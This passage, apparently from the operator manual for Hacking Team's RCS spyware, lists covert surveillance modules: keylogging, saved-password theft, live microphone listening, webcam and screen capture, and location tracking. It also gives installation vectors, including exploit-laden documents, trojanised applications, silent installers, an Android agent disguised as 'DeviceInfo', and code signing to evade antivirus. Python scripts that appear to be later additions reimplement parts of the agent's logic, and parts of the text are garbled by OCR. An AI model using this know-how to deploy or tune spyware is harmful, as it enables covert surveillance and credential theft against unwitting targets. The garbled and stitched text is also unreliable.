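    if kind == "loop":
        return True                                        # always on; Repeat fires every interval
    if kind == "daily":
        return rule["from"] <= now.time() < rule["to"]     # From/To are times of day
    if kind == "date":
        if now < rule["from"]:
            return False
        return bool(rule.get("forever")) or now < rule["to"]
    if kind == "install":
        return now >= installed_at + timedelta(days=rule["days"])
    raise ValueError(f"unknown timer type {kind!r}")


def transitions(rule, samples, installed_at):
    """Return ("start"|"stop", ISO timestamp) for each change of state across
    the sampled instants: Start runs on the first, Stop on the second."""
    out, prev = [], None
    for t in samples:
        cur = timer_active(rule, t, installed_at)
        if prev is not None and cur != prev:
            out.append(("start" if cur else "stop", t.isoformat()))
        prev = cur
    return out


def repeat_ticks(interval_s, window_s):
    """Number of Repeat firings for a Loop timer in a window of `window_s`
    seconds, the first firing being at the start of the window."""
    if window_s <= 0 or interval_s <= 0:
        return 0
    return -(-window_s // interval_s)                      # ceiling division


# Constructed sample: agent installed on 2013-09-01, sampled at a few instants.
INSTALLED = datetime(2013, 9, 1, 0, 0)
DAILY_RULE = {"type": "daily", "from": time(9, 0), "to": time(17, 0)}
DATE_RULE = {"type": "date", "from": datetime(2013, 9, 1), "to": datetime(2013, 9, 10)}
INSTALL_RULE = {"type": "install", "days": 7}


def demo():
    """Evaluate each rule type on the constructed samples."""
    day = datetime(2013, 9, 5)
    daily_samples = [day.replace(hour=h) for h in (8, 9, 12, 17)]
    date_samples = [datetime(2013, 8, 31), datetime(2013, 9, 5), datetime(2013, 9, 11)]
    return {
        "daily": transitions(DAILY_RULE, daily_samples, INSTALLED),
        "date": transitions(DATE_RULE, date_samples, INSTALLED),
        "date_forever": transitions(dict(DATE_RULE, forever=True), date_samples, INSTALLED),
        "install": [timer_active(INSTALL_RULE, d, INSTALLED)
                    for d in (datetime(2013, 9, 7), datetime(2013, 9, 8))],
        "loop_ticks_10min_every_3min": repeat_ticks(180, 600),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

Note the boundary conventions the model makes explicit: a Daily window is half-open, so a sample taken exactly at To is already outside it, and a Date rule with Forever set produces a Start but never a Stop.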
Window event
Purpose
The Window event triggers an action when any window is opened.
Operating systems
Desktop: Windows
Parameters
None.
WinEvent event
Purpose
The WinEvent event triggers an action when the operating system logs a Windows event.
Operating systems
Desktop: Windows
Parameters
Name | Description
ID | Windows event ID.
Source | Windows event source (e.g. System, Application).
11
Appendix: modules
Presentation
Introduction
An agent is a complex group of events, actions, modules and installation vectors. Single modules are listed below with a detailed description of advanced configuration settings.
Content
This section includes the following topics:
Module list 122
Addressbook module 123
Application module 124
Calendar module 124
Call module 125
Camera module 125
Chat module 126
Clipboard module 126
Conference module 127
Crisis module 127
Device module 129
File module
Infection module 130
Keylog module
Livemic module
Messages module 131
Mic module
Mouse module
Password module 134
Position module
Screenshot module
Url module 136
Module list
Registration modules are described below:
Module | Configuration | Device | Data recorded
Accessed files | base | desktop | documents or images opened by the target.
Addressbook | advanced | desktop, mobile | contacts.
Application | advanced | desktop, mobile | applications used.
Calendar | advanced | desktop, mobile | calendar.
Call | advanced | desktop, mobile |
Calls | base | desktop, mobile |
Camera | base, advanced | desktop, mobile | webcam images.
Chat | advanced | desktop, mobile |
Clipboard | advanced | desktop, mobile | information copied to the clipboard.
Contacts and Calendar | base | desktop, mobile | contacts and calendar.
Device | advanced | desktop, mobile | system information.
File | advanced | desktop | files opened by the target.
Keylog | advanced | desktop, mobile | keys pressed on the keyboard.
Keylog, Mouse and Password | base | desktop | keys pressed on the keyboard, mouse clicks, passwords saved.
Messages | advanced | desktop, mobile | e-mail, SMS, MMS.
Messages | base | desktop, mobile | e-mail, SMS and chat.
Mic | advanced | desktop, mobile | audio from a microphone.
Module | Configuration | Device | Data recorded
Mouse | advanced | desktop |
Password | advanced | desktop |
Position | base, advanced | mobile | target's geographic position.
Screenshot | advanced | mobile | windows opened on the target's screen.
URL | advanced | desktop, mobile | visited URLs.
Visited websites | base | desktop, mobile | visited URLs.
Other types of modules are described below:
Module | Configuration | Device | Action
Conference | advanced | mobile | Opens a 3-way call.
Crisis | advanced | desktop, mobile | Recognizes crisis situations (e.g. a sniffer running), during which all commands can be temporarily disabled.
Infection | advanced | desktop | Propagates the agent to other devices.
Livemic | advanced | mobile | Listens to conversations in real time.
Online synchronization | base | desktop, mobile | Synchronizes the agent with RCS to allow evidence to be received and the agent to be reset.
Addressbook module
Purpose
The Addressbook module records all the information found in the device's addressbook. The desktop version imports contacts from Outlook, Skype and other sources.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, WinMobile
Significant data
None
Application module
Purpose
The Application module records the name and information on processes opened and closed on the target device.
Evidence lists all the applications used by the target in chronological order.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, Symbian, WinMobile
Significant data
None
Calendar module
Purpose
The Calendar module records all the information found in the calendar on the target device. The desktop version imports the calendar from Outlook and other sources.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, WinMobile
Significant data
None
Call module
Purpose
The Call module captures audio and information (start time, length, caller and called numbers) for all calls made and received by the target.
On a desktop device, the Call module taps voice conversations on supported applications. On a mobile device, the Call module taps all calls.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry (information only), Symbian (without suppressing the audio signal), WinMobile
Significant data
Data is described below:
Field | Description
Enable call recording | (mobile only) Enables call recording. If disabled, call audio is not recorded.
Buffer size | Acquisition buffer size used for audio sectors.
Quality | Audio quality (1 = maximum compression, 10 = best quality).
Camera module
Purpose
The Camera module captures an image from the built-in camera.
WARNING: capturing an image on a desktop causes the camera LED to blink.
Operating systems
Desktop: Windows, OS X
Mobile: Symbian (front camera only, when available), WinMobile
Significant data
Data is described below:
Field | Description
Quality | Image quality (1 = maximum compression, 10 = best quality).
Chat module
Purpose
The Chat module records all the target's chat sessions. Each message is captured as a single piece of evidence.
IMPORTANT: for Android, root privileges are required to capture chat. See "What you should know about Android" on page 139.
IMPORTANT: in order for this module to be started when the device is restarted on BlackBerry, the telephone must be in stand-by for several minutes (backlight off).
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry
Significant data
None
Clipboard module
Purpose
The Clipboard module saves the content of the clipboard in text format.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, WinMobile
Significant data
None
Conference module
Purpose
The Conference module calls the indicated number, opening a conference call whenever the target makes a call. The receiver's number can listen to the conversation in real time.
IMPORTANT: module operation depends on the telecom operator's features. The target may be made aware of the conference call if the telecom operator adds an acoustic signal while waiting for the call to start.
Operating systems
Mobile: WinMobile
Significant data
Data is described below:
Field | Description
Number | Receiver's phone number.
Crisis module
Behavior on desktop devices
The Crisis module is enabled (automatically or upon a specific action) and recognizes dangerous situations on the machine that may disclose the agent's presence on the device (e.g. a network sniffer running). In such situations, all commands can be temporarily disabled.
This module increases the level of stealthiness against protection software.
NOTE: Crisis can be enabled by default on the desktop device to allow the agent to automatically detect dangerous situations and act accordingly (i.e. going silent).
Behavior on mobile devices
The Crisis module is used to suspend activities that make heavy use of battery power. Based on its settings, this module can temporarily disable some functions.
RC3 9 - Operating systems
On a mobile device, the Crisis module must be explicitly started by a speci?c action agent is
started when the battery level is too low] and stopped when the anomalous situation terminates.
NOTE: this module does not create evidence.
Operating systems
Desktop: Windows, OS
Mobile: Android, BlackBerry, WinMobile, Windows Phone
Significant desktop data
On Desktops, the default settings should not be changed unless otherwise suggested by RC5
Support Team.
Fieid Description
Inhibits Network Inhibits when potentially dangerous processes are running.
Network lnhib- List of processes that, if running, will prevent
itors
Inhibits Hooking Inhibits program hooking when potentially dangerous processes are run-
ning.
Hooking Inhibitors List of processes that, if running, will prevent hooking.
Process Process to be added to the list.
Significant mobile data
In the Mobile version, the functions to be blocked can be specified:
Field: Description
Mic: if selected, prevents Mic audio recording.
Call: if selected, prevents Call audio recording.
Camera: if selected, prevents Camera snapshots.
Position: if selected, prevents GPS use.
(field name illegible in source): if selected, prevents (remainder illegible in source).
WARNING: highly hazardous operation. Contact the HackingTeam support service before selecting this option; your agent may be permanently lost.
Device module
Purpose
The Device module records system information (e.g. processor type, memory in use, installed operating system, root privileges). It can be useful to monitor disk usage on the device and to retrieve the list of installed applications.
NOTE: for Android, if the device has root privileges, the Device type evidence indicates root:yes.
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, Symbian, WinMobile, Windows Phone
Significant mobile data
Data is described below:
Field: Description
Retrieve application list: in addition to system information, record the list of installed applications.
File module
Purpose
The File module records all files that are opened on the target computer. It can also capture the file when it is opened.
Operating systems
Desktop: Windows, OS X
Significant data
Data is described below:
Field: Description
Include Filters: list of file extensions to be recorded. Optionally specify the process, to log the file when it is run or opened by that process.
Exclude filters: list of file extensions that will not be recorded. Optionally specify the process, to ignore the file when it is run or opened by that process.
Mask: string used to filter the process and file to log or ignore.
  Syntax: "<Process> <Filter>"
  Examples of masks used to log:
    "skype.exe (remainder cut off in source)
    "word.exe *John*.doc"
  Example of a mask used to ignore:
    "skype.exe *.dat"
Log path and access mode: records the file path and access type (read, write).
Capture file content: if enabled, the file is copied and downloaded at the first access.
MiniMax size: minimum and maximum size admitted for the file to be downloaded.
Newer than: minimum file creation date to be downloaded.
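The following Python script is an added worked example and is not part of the RCS product or of this guide: it evaluates File-module-style masks against file-access events, using the two mask examples from the table above. The event records, the size window and the date are constructed. Three points are assumptions rather than statements of the guide: a mask with only a process name is read as "<process> *", exclude masks take precedence over include masks, and matching is case-insensitive on the file name and on the process image name.

```python
"""Evaluate File-module style include/exclude masks against file-access events.

Added example; this is not Hacking Team code. Taken from the guide: the mask syntax
"<process> <file filter>", the include/exclude lists, the MiniMax size window and the
"Newer than" creation-date gate. Assumptions: a mask with only a process name means
"<process> *", exclude masks take precedence over include masks, and matching is
case-insensitive on the file name and process image name.
"""
import fnmatch
import ntpath
from dataclasses import dataclass
from datetime import datetime
from typing import Iterable, Tuple


@dataclass(frozen=True)
class Mask:
    process: str  # image name the target uses, e.g. "word.exe" ("*" = any process)
    pattern: str  # glob on the file name, e.g. "*John*.doc"


@dataclass(frozen=True)
class FileEvent:
    process: str       # image name or full path of the process touching the file
    path: str          # full path of the file being opened
    size: int          # file size in bytes
    created: datetime  # file creation timestamp
    access: str        # "read" or "write" (what "Log path and access mode" records)


def parse_mask(text: str) -> Mask:
    """Parse one mask string such as '"word.exe *John*.doc"' (quotes optional)."""
    body = text.strip().strip('"').strip()
    if not body:
        raise ValueError("empty mask")
    parts = body.split(None, 1)
    pattern = parts[1].strip() if len(parts) == 2 else "*"  # assumption: bare process = all files
    return Mask(parts[0].lower(), pattern.lower())


def _matches(mask: Mask, ev: FileEvent) -> bool:
    proc = ntpath.basename(ev.process).lower()
    name = ntpath.basename(ev.path).lower()
    return fnmatch.fnmatchcase(proc, mask.process) and fnmatch.fnmatchcase(name, mask.pattern)


def evaluate(ev: FileEvent, include: Iterable[Mask], exclude: Iterable[Mask],
             min_size: int, max_size: int, newer_than: datetime) -> Tuple[bool, bool]:
    """Return (log_path, capture_content) for one file-access event.

    log_path: the event matches an include mask and no exclude mask, so the path and
    access mode would be recorded.
    capture_content: log_path holds and the file is inside the MiniMax size window and
    was created on or after newer_than; the guide applies both gates to the download
    only, not to path logging.
    """
    if any(_matches(m, ev) for m in exclude):
        return False, False
    if not any(_matches(m, ev) for m in include):
        return False, False
    capture = min_size <= ev.size <= max_size and ev.created >= newer_than
    return True, capture


# Configuration built from the guide's own mask examples; sizes and date are constructed.
INCLUDE = [parse_mask('"word.exe *John*.doc"'), parse_mask('"skype.exe"')]
EXCLUDE = [parse_mask('"skype.exe *.dat"')]
MIN_SIZE, MAX_SIZE = 1_024, 10_000_000   # MiniMax size, bytes
NEWER_THAN = datetime(2013, 1, 1)        # "Newer than" gate


def demo() -> list:
    """Constructed events; returns the (log_path, capture_content) verdict for each."""
    events = [
        FileEvent(r"C:\Program Files\Microsoft Office\word.exe",
                  r"C:\Users\t\Documents\Letter to John.doc", 30_000, datetime(2013, 5, 2), "read"),
        FileEvent("word.exe", r"C:\Users\t\Documents\Budget.xls", 20_000, datetime(2013, 5, 2), "write"),
        FileEvent("skype.exe", r"C:\Users\t\AppData\Roaming\Skype\main.dat", 4_000_000,
                  datetime(2013, 5, 2), "read"),
        FileEvent("skype.exe", r"C:\Users\t\Downloads\contract.pdf", 150_000, datetime(2012, 11, 3), "read"),
        FileEvent("word.exe", r"C:\Users\t\Documents\John_archive.doc", 60_000_000,
                  datetime(2013, 6, 1), "read"),
    ]
    return [evaluate(e, INCLUDE, EXCLUDE, MIN_SIZE, MAX_SIZE, NEWER_THAN) for e in events]


if __name__ == "__main__":
    for verdict in demo():
        print(verdict)
```

Running demo() shows the effect of each gate in turn: the John document is logged and captured; Budget.xls matches no include mask; main.dat is dropped by the exclude mask; contract.pdf is logged but not captured because it predates the "Newer than" date; John_archive.doc is logged but not captured because it exceeds the maximum size.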
Infection module
IMPORTANT: the module was deprecated as of RCS 8.4.
Keylog module
Purpose
The Keylog module records all keystrokes on the target device.
NOTE: it supports all Unicode characters via IME.
Operating systems
Desktop: Windows, OS X
Mobile:
Significant data
None
Livemic module
Purpose
The Livemic module lets you listen to a conversation in progress in real time.
IMPORTANT: this module comes "as is" and its use can be dangerous. Each device works differently. We recommend you run thorough tests before using it in the field.
Operating systems
Mobile: WinMobile
Significant data
Data is described below:
Field: Description
Number: number of the phone used for listening. It must include the international country code.
WARNING: do not hide the caller ID, and disable your microphone while listening to the conversation.
Messages module
Purpose
The Messages module records all messages received and sent by the target. This module captures:
- e-mail
- SMS (mobile only)
- MMS (mobile only)
Operating systems
Desktop: Windows
Mobile: Android, BlackBerry, WinMobile (one further platform row is illegible in the source)
The source table showing which message types (e-mail, MMS, SMS text messages) are captured on each mobile platform did not survive extraction.
IMPORTANT: for Android, only Gmail e-mail is captured and root privileges are required. See "What you should know about Android" on page 139.
Significant data
Data is described below:
Field: Description
Enabled: enables recording.
From: records messages starting from the indicated date.
To: records messages until the indicated date.
Max size: maximum size of the message to be recorded.
Mic module
Purpose
The Mic module records the surrounding audio using the device's microphone.
Platforms
Desktop: Windows, OS X
Mobile: Android (disabled during calls), BlackBerry (disabled during calls), Symbian (disabled
during calls), WinMobile, Windows Phone (disabled during calls)
IMPORTANT: do not turn on the microphone to record data calls (i.e. Skype, Viber) without having fully tested the phone model with the same operating system version. You may disable the client's audio, making the relevant application unusable.
NOTE: for Windows Phone, recording start and end may be accompanied by an audio signal on some device models.
Significant data
Data is described below:
Field: Description
Silence between voices: maximum number of seconds of silence admitted in the recording. After the set period, the agent stops recording and restarts when sound is received again.
  WARNING: if the value is too low, the recording will exclude all silences and the conversation will flow without pauses. If the value is too high, the recording will include all silences and the conversation will be very long.
Voice recognition: value used to identify human voice and exclude any background noise from the recording.
  WARNING: 0.2-0.28 is the suggested interval to identify human voice. Higher values better adapt to female voices but may result in the recording of background noise.
Autosense: if enabled, the agent attempts to change audio mixer settings (microphone on/off, line selection and volume) to optimize audio recording quality, avoiding low volumes or interruptions in the recording.
  NOTE: not supported by BlackBerry, Android, Symbian, Windows Phone.
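An added example, not RCS code, of what the "Silence between voices" and "Voice recognition" settings do: a small energy-based silence trimmer run over a constructed signal, in which a 440 Hz tone stands in for speech and a faint 60 Hz hum for background noise. The 20 ms frame length, the use of per-frame RMS (on a -1..1 scale) as the "voice recognition" value, and the exact stop/restart rule are assumptions; real speech would need a proper voice activity detector.

```python
"""Silence trimming as described by the Mic module's "silence between voices" and
"voice recognition" settings.

Added example, not Hacking Team code. Energy-based voice activity detection over a
constructed signal: a 440 Hz tone stands in for speech and a faint 60 Hz hum for
background noise. Assumptions: 20 ms frames, frame RMS on a -1..1 scale as the
"voice recognition" value, and up to max_silence_s of silence kept inside a recording
before the agent stops and waits for sound again.
"""
import math
from typing import List, Tuple

SAMPLE_RATE = 8000
FRAME_MS = 20


def frame_rms(samples: List[float], frame_len: int) -> List[float]:
    """RMS level of each consecutive frame of frame_len samples."""
    out = []
    for i in range(0, len(samples), frame_len):
        chunk = samples[i:i + frame_len]
        out.append(math.sqrt(sum(s * s for s in chunk) / len(chunk)))
    return out


def segment_recording(samples: List[float], voice_threshold: float,
                      max_silence_s: float) -> List[Tuple[float, float]]:
    """Return the (start_s, end_s) stretches that would be recorded.

    Recording starts at the first frame whose RMS reaches voice_threshold. Silence
    up to max_silence_s is admitted into the recording; once it runs longer than that
    the recording stops, and it restarts when sound is received again.
    """
    frame_len = SAMPLE_RATE * FRAME_MS // 1000
    levels = frame_rms(samples, frame_len)
    max_silent_frames = round(max_silence_s * 1000 / FRAME_MS)
    segments, recording, start, silent_run = [], False, 0.0, 0
    for idx, level in enumerate(levels):
        t = idx * FRAME_MS / 1000
        if level >= voice_threshold:
            silent_run = 0
            if not recording:
                recording, start = True, t
        elif recording:
            silent_run += 1
            if silent_run > max_silent_frames:
                segments.append((start, t))   # the admitted silence stays in the clip
                recording, silent_run = False, 0
    if recording:
        segments.append((start, len(levels) * FRAME_MS / 1000))
    return segments


def recorded_seconds(segments: List[Tuple[float, float]]) -> float:
    return round(sum(end - start for start, end in segments), 3)


def synth_conversation() -> List[float]:
    """Constructed 6.5 s signal: 1 s speech, 3 s pause, 1 s speech, 0.5 s pause, 1 s speech."""
    def tone(seconds: float, amp: float, freq: float) -> List[float]:
        n = int(seconds * SAMPLE_RATE)
        return [amp * math.sin(2 * math.pi * freq * i / SAMPLE_RATE) for i in range(n)]

    def speech(seconds: float) -> List[float]:
        return tone(seconds, 0.5, 440.0)   # RMS about 0.35, above the suggested 0.2-0.28

    def hum(seconds: float) -> List[float]:
        return tone(seconds, 0.05, 60.0)   # RMS about 0.035, well below it

    return speech(1.0) + hum(3.0) + speech(1.0) + hum(0.5) + speech(1.0)


if __name__ == "__main__":
    audio = synth_conversation()
    for thr, gap in ((0.25, 2.0), (0.25, 0.3), (0.01, 2.0), (0.6, 2.0)):
        segs = segment_recording(audio, thr, gap)
        print(f"threshold={thr} max_silence={gap}s -> {segs} ({recorded_seconds(segs)} s)")
```

With the suggested threshold and a 2 s silence limit the 6.5 s signal yields two clips (0-3 s and 4-6.5 s); cutting the limit to 0.3 s also splits the second clip at the half-second pause. Dropping the threshold to 0.01 records the hum as speech and produces one unbroken 6.5 s clip, which is the background-noise effect the warning above describes; raising it to 0.6 records nothing at all.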
Mouse module
Purpose
The Mouse module captures the image of a small area of the screen around the mouse pointer upon each click.
It helps to defeat virtual keyboards used to avoid keystroke recording. See "Keylog module" on page 130.
Operating systems
Desktop: Windows, OS X
Significant data
Data is described below:
Field: Description
Width, Height: captured image dimensions.
Password module
Purpose
The Password module logs all passwords saved in the user's accounts. Passwords saved in browser, instant messenger and web-mail clients are collected.
Operating systems
Desktop: Windows
Mobile: Android
Significant data
None
Position module
Purpose
The Position module records the device position using the GPS system, GSM cell or WiFi
information.
Operating systems
Desktop: (WiFi only) Windows, OS X
Mobile: Android, BlackBerry, Symbian, WinMobile, Windows Phone
Significant mobile data
Data is described below:
Field: Description
GPS: finds the position from GPS information.
Cell: finds the position from GSM cell or CDMA information.
Wifi: finds the position from the WiFi station BSSID.
NOTE: for Windows Phone, the system internally sets the most efficient way to find the device position at a given time, regardless of the set parameters.
Screenshot module
Purpose
The Screenshot module captures the target device's screen image.
IMPORTANT: for Android, root privileges are required to capture screenshots. See
"What you should know about Android" on page 139 .
Operating systems
Desktop: Windows, OS X
Mobile: Android, BlackBerry, Symbian, WinMobile
Significant data
Data is described below:
Field: Description
Quality: captured image final quality.
  Low: worst image quality, maximum compression.
  High: best image quality, less compression.
  Tip: leave the default value.
Foreground window: (desktop only) captures a snapshot of the foreground window.
Url module
Purpose
The Url module records the name of the websites visited by the target's browser.
Operating systems
Desktop: Windows, OS X
Mobile: BlackBerry, Symbian, WinMobile.
IMPORTANT: when a BlackBerry is restarted, in order for this module to be started, the telephone must be left for several minutes with the backlight off.
Significant data
None
12
Appendix: installation vectors
Presentation
Introduction
An agent is a complex group of events, actions, modules and installation vectors. The individual installation vectors are listed below with a detailed description of their advanced configuration settings.
Content
This section includes the following topics:
List of installation vectors  138
What you should know about Android  139
Obtaining a Code Signing certificate  139
Exploit vector (desktop)  140
Melted Application vector  141
Network Injection vector  141
Offline Installation vector  142
Silent Installer vector  143
U3 Installation vector
Exploit vector (mobile)  144
Installation Package vector
Local Installation vector
QR Code/Web Link vector  149
WAP Push Message vector
Installation Package preparation for Symbian  152
Installation Package preparation for Windows Phone  154
List of installation vectors
Operating systems supported by agents
Operating systems supported by the various desktop and mobile devices are listed below:
Device: Operating System
Desktop: Windows, OS X
Mobile: Android, BlackBerry, Windows Mobile, Symbian, iOS
Vector list:
Installation Vector: Device: Description
Applet Web: Desktop: deprecated as of RCS version 8.4.
Exploit: Desktop, Mobile: adds the agent to any document (the document format may depend on the available exploits).
Installation Package: Mobile: creates an auto-installer file with the agent.
Local Installation: Mobile: installs the agent on the target device either through USB or memory card.
Melted Application: Desktop: adds the agent to any application file.
Network Injection: Desktop: link to the injection rule creation page. See "Managing the Network Injector" (page number illegible in source).
Offline Installation: Desktop: creates an ISO file to generate a bootable medium to be used on a computer that is off or hibernating.
QR Code/Web Link: Mobile: generates a QR code for sites or printouts that, if photographed by the target, will install the agent.
Installation Vector: Device: Description
Silent Installer: Desktop: creates an empty executable file that, when run on the target device, installs the agent.
U3 Installation: Desktop: creates a package to be installed via a U3 key. The U3 key automatically installs the agent on the target device when inserted.
WAP Push Message: Mobile: sends a WAP message that will install the agent if accepted by the target.
What you should know about Android
Root privileges
The Android operating system requires root privileges to run some operations on its devices.
An Android device agent requires root privileges to:
- capture chat, see "Chat module" on page 126
- capture e-mail, see "Messages module" on page 131
- capture screenshots, see "Screenshot module" on page 135
- keep updated, see "Agent page" on page 41 and "Target page" on page 28
Obtaining root privileges
Root privileges can be automatically obtained without any interaction on the device.
However, automatic acquisition is not always guaranteed. If automatic acquisition fails and Require administrative privileges was selected during agent compilation, the agent asks the user to manually grant privileges on the device, if permitted by the operating system. See "Melted Application vector" on page 141.
Checking for root privileges
To check for root privileges on the target device, enable the Device module.
Root status is indicated in the Device type evidence; if root privileges were obtained, root:yes appears.
Obtaining a Code Signing certificate
Introduction
In order to use the code signing functions available during vector compiling, a Code Signing certificate issued by a recognized Certification Authority must be obtained.
Most Certification Authorities offer Code Signing certificates, including:
- Verisign
- Thawte
- GoDaddy
Installing the Code Signing certificate
On the Backend system, from the appropriate folder (its name is illegible in the source), enter the following command:
> rcs-db-config --sign-cert <certificate file> --sign-pass <password>
Result: the certificate is installed in the system and the code signing function can now be used.
Exploit vector (desktop)
Purpose
Compiling creates an installer which, when opened on the target device, exploits a vulnerability of a specific program. Different behaviors may be experienced depending on the specific exploit (e.g. the running program is aborted).
Installation
The installer is created and the packet of utility files is automatically saved in the C:\RCS\Collector\public folder. These files may be used in many types of attacks (e.g. via a link from a website).
Deleting no longer used files
Packets saved in the folder C:\RCS\Collector\public can be deleted using the File Manager function, see "Frontend management".
Operating systems
OS X, Windows
Parameters
Name: Description
File type: type of file to be infected (e.g. .PDF).
Choose an Exploit: full name of the application used by the target to open the file (e.g. Adobe Acrobat Reader 10).
URL: URL pointing to the desired agent installation package.
Document: either URL (connection to an Anonymizer where the installer was saved) or Document (select the file to be infected).
Melted Application vector
Purpose
Compiling modifies an existing executable by inserting the agent into it.
The agent components are packaged so as to hinder reverse engineering.
Operating systems
Android, OS X, Windows
Parameters
Name: Description
Application to be used as dropper: executable file to which the agent is added. The file type differs based on the operating system:
- Android: third-party APK application. IMPORTANT: test the final application, since some applications run additional runtime security controls.
- OS X: compressed Mac OS .app file. The application (a folder) must be compressed using the zip command from the Terminal.app console. IMPORTANT: do not use the Compress menu item from the Finder application.
- Windows: any EXE file.
Require administrative privileges: (Android only) if automatic acquisition fails, this option enables the user request to manually obtain root privileges from the device. WARNING: the request is displayed on the target device.
Network Injection vector
Purpose
The page opens the Network Injector function in the System section.
Operating systems
Parameters
Offline Installation vector
Purpose
Compiling creates an auto-installer ISO file to be written to a CD or USB thumbdrive (Windows only).
Insert the CD or USB key, then turn on the target computer. Boot from the inserted media and wait for a menu to appear. Infection can be done selectively by choosing from a list of all the available users on the system.
Operating systems
Multiplatform.
Parameters
Name: Description
Bootable CD/DVD: creates an ISO auto-installer for CD or DVD.
Bootable USB drive: (Windows only) creates an ISO auto-installer for a USB key.
Dump Mask: automatically extracts documents belonging to a certain user. Documents can be saved on a USB peripheral to later be imported into the RCS database. Three document capture options are available:
- Documents: MS Office, PDF and text file documents
- Images: photos and images
- Custom: select the file extensions to be captured, separated by the pipe character
Silent Installer vector
Purpose
Compiling creates an executable that installs the agent in silent mode. No output is visible on the device.
Operating systems
OS X, Windows
Parameters
Name: Description
Require administrative privileges: administrator privileges are required during agent installation. Behavior differs according to operating system:
- OS X: if selected, the agent will request the root password, corrupting the authentication dialogue. If not selected, some modules will not work.
- Windows: if selected, administrator privileges will be required to proceed with agent installation. The option must be selected to target Windows Vista devices when the user is a member of the Administrators group. In all other cases, leave the option blank.
Include 64bit support (100 KiB): (Windows only) the executable supports 64bit machines (size will increase by 100 KiB).
Include audio codec (200 KiB): (Windows only) the executable includes the audio codec (size will increase by 200 KiB).
NOTE: even if this option is not selected, the agent will download the audio codec required for the type of evidence to be acquired at first synchronization.
Use the certificate to sign the dropper: sign the executable using the digital certificate. The digital signature can significantly increase the level of invisibility to anti-viruses.
IMPORTANT: follow the procedure to receive a certificate to use this function. See "Obtaining a Code Signing certificate" on page 139.
Service call: for further information on how to obtain a digital certificate, contact HackingTeam support service.
NOTE: 1 KiB is 1024 byte.
U3 Installation vector
Purpose
Compiling creates an ISO auto-installer to be written on a U3 key (SanDisk) using the U3 customizer program (the software can be downloaded from the Internet).
When the key is inserted in the device, a menu opens for agent installation (no USB disk is automatically detected).
Operating systems
Windows
Parameters
None.
Exploit vector (mobile)
Purpose
Compiling creates an installer that, executed on the target device, results in the device being infected.
Different behaviors may be experienced depending on the specific Exploit (for example, the running program is aborted).
Installation
The installer must be copied to the device and install.sh run from the copied folder.
IMPORTANT: the device must be unlocked.
The packet of utility files is automatically copied to the folder C:\RCS\Collector\public. These files may be used in many types of attacks (for example, via a link from a website).
Deleting no longer used files
Packets saved in the folder C:\RCS\Collector\public can be deleted using the File Manager function, see "Frontend management".
Example of installer copy command on the device
mymac> scp -r
mymac> ssh root@myiphone.local.net
myiphone> cd
myiphone> sh install.sh
Operating systems
Parameters
Name: Description
File type: type of file to be infected.
Choose an Exploit: full application name used by the target to open the file (e.g., Adobe Acrobat Reader 10).
URL / Document: settings that identify the file to be infected.
- URL: connection to an Anonymizer where the installer was saved.
- Document: select the file to be infected.
Installation Package vector
Purpose
Compiling creates an executable that installs the agent in silent mode. The executable can be loaded on the device with any of these methods:
- download from URL,
- link via
- directly from computer via USB cable,
- (Windows Mobile only) direct copy to SD card,
- (Windows Phone only) attachment via email.
Notes for Android operating systems (vector preparation)
Compiling generates two APK vectors (Android Application Package File):
- ApplicationName.v2.apk: vector for Android 2.x
- the default APK vector: vector for Android 3.x and 4.x
Notes for Android operating systems (installation)
The installation procedure is provided below:
Step Action
1 Enable the Unknown origins option in the device settings (typically under Settings, Applications). The option can be disabled after installation.
NOTE: if this option is not enabled, a request to authorize an application not in the Android Market appears during installation.
2 Device root privileges must be obtained if the vector includes the Screenshot, Chat and Messages modules. See "What you should know about Android" on page 139.
3 Run the appropriate APK vector on the selected device.
4 During APK vector installation, accept the permissions requested by the agent. For Android 3.x and 4.x, click Open to start the vector, otherwise the vector will not be installed.
IMPORTANT: the default APK vector for Android 3.x and 4.x appears as a normal application called DeviceInfo, that displays device information.
5 A request to obtain root privileges could appear when the vector is running if the Require Administrative Privilege option was enabled.
Notes for Windows Phone operating systems (vector preparation)
Compiling a factory with the Installation Package vector for the Windows Phone operating system creates the .zip file FactoryName_winphone_silent.zip in the RCS Download folder. The .zip contains two files:
- ApplicationName.xap: packet with the applications to be installed on the target device
- ApplicationName.aetx: company certificate to install the application
IMPORTANT: in order for compiling to be successfully completed, follow the procedure to load the necessary files in RCS. See "Installation Package preparation for Windows Phone" on page 154.
Notes for Windows Phone operating systems (installation)
The MyPhoneInfo application, used to install the agent, is included in the packet with .xap applications. Installation does not require phone unlock.
.xap and .aetx files can be sent to the target device:
- as attachments in an email,
- as a link in a web page.
For installation via web, the Web service must correctly support the MIME types for the .xap and .aetx files; the following lines must be present in the mime.types file:
application/x-silverlight-app xap
application/x-aetx aetx
Run the following procedure for both modes:
Step Action
1 Open the file ApplicationName.aetx.
IMPORTANT: this is the certificate that must always be opened first.
2 Answer the displayed questions by clicking Add.
3 Open the file ApplicationName.xap.
4 Answer the displayed questions by clicking Install: the MyPhoneInfo application will be installed on the phone.
5 From the application list, open the MyPhoneInfo application at least once.
6 Close MyPhoneInfo: the agent is ready.
IMPORTANT: if you exit the application without closing it, the application, and thus the agent, are suspended. The agent only starts when the application is closed or the phone is turned back on.
The agent communicates with the RCS server if and as long as the MyPhoneInfo application is installed on the device and the device is on. If a mobile data connection is not available, the agent can only communicate with the RCS server when the user uses the phone or the phone is connected to a computer or battery charger.
NOTE: when the device is turned on, it takes 30 minutes for the agent to restore communications with the RCS server. The 30 minutes are guaranteed if mobile data and Wi-Fi connections are running on the device. Otherwise, it could take longer.
Notes for Windows Mobile operating systems
An existing CAB installer can be specified to which the agent will be added.
If a CAB is not specified, the system will use a default, dummy CAB.
Notes for BlackBerry operating systems
To allow the agent to be downloaded on a BlackBerry, extract the created zip file on a web server the device can access.
NOTE: the web server must correctly support the MIME types for .jad and .cod files, text/vnd.sun.j2me.app-descriptor and application/vnd.rim.cod respectively. The Collector public folder automatically runs this function.
Once the installer is run on the device, accept the permissions requested by the agent.
